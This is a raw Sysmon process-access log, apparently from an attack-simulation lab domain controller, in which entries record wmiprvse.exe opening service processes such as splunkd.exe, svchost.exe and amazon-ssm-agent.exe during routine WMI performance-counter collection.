13:54:44.517{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3600-000000009101}3344C:\Windows\system32\wbem\unsecapp.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000004841Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.517{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3600-000000009101}3344C:\Windows\system32\wbem\unsecapp.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000004840Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.517{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3500-000000009101}3240C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000004839Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.517{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3500-000000009101}3240C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000004838Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.517{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3400-000000009101}3224C:\Windows\system32\dfssvc.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000004837Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.517{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3400-000000009101}3224C:\Windows\system32\dfssvc.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000004836Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.517{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3300-000000009101}3080C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000004835Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.517{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3300-000000009101}3080C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000004834Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.517{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3200-000000009101}2472C:\Windows\system32\DFSRs.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000004833Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.517{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3200-000000009101}2472C:\Windows\system32\DFSRs.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000004832Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.517{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3100-000000009101}2528C:\Windows\System32\ismserv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000004831Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.517{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3100-000000009101}2528C:\Windows\System32\ismserv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000004830Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.517{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3000-000000009101}1548C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000004829Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.517{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3000-000000009101}1548C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000004828Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.517{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2F00-000000009101}416C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000004827Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.517{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2F00-000000009101}416C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000004826Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 